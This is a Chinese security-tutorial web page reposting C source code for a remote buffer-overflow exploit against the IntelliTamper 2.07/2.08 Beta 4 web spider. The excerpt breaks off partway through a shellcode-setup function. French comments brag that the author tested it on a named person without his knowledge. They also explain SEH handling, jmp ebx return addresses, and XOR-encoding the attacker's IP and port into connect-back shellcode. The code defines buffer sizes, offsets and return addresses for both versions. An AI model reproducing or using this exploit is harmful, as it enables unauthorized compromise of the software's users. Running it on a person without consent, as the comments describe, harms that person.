手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
摘要:/********************************************************************/...

/********************************************************************/

/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */

/********************************************************************/

/* NO MORE */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/********************************************************************/

/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */

/* Jef_FR pourra vous le confirmer hihi :P */

/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */

/* ben y'a du SEH alors le premier lien qui est fait plus petit */

/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */

/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */

/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */

/* j'ai remarqué que sur les deux versions une fois que ca crash */

/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */

/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */

/* regardé sur d'autres plateformes, vu que j'ai deja des ret */

/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */

/* */

/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */

/* opcode du genre < > " r n ... C'est pas sorcier a coder :) */

/********************************************************************/

/* informations: , irc undernet #coromputer */

/********************************************************************/

#include

#include

#include

#ifdef _WIN32

#include

#pragma comment(lib, "ws2_32")

#else

#include

#endif

#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07

* for v2.07 it isn't this size 'cause

* there's a *missing* in RET_ADDR2

* so it cuts the size.

*/

#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */

#define RET_POS SIZEOF-4

#define RET_ADDR 0x004368C4

#define SCOFFSET2 100 /* IntelliTamper v2.07 */

#define RET_POS2 6832

#define RET_ADDR2 0x00437224

#define u_short unsigned short

#define u_char unsigned char

#define HOP 0xd9 /* host opcode */

#define POP 0xda /* port opcode */

#define BEGIN "rnrn"

#define END "rn"

int set_sc(char *host,unsigned long port, char *sc)

{

unsigned long ip,p;

unsigned int i;

ip=inet_addr(host)^0x98989898;

p=htons((u_short)port);

p=p

【IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit】相关文章:

远离病毒 八项基本原则

360加速球怎么更换皮肤

phpddos流量攻击预防方法

金山毒霸永久关闭热点新闻的方法

瑞星杀毒防火墙怎么卸载

WordPress 4.0以下版本存在跨站脚本漏洞

445端口入侵原因详细解析

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

注册表编辑器怎么打开?

设置Win8系统“家庭安全”的方法

精品推荐
分类导航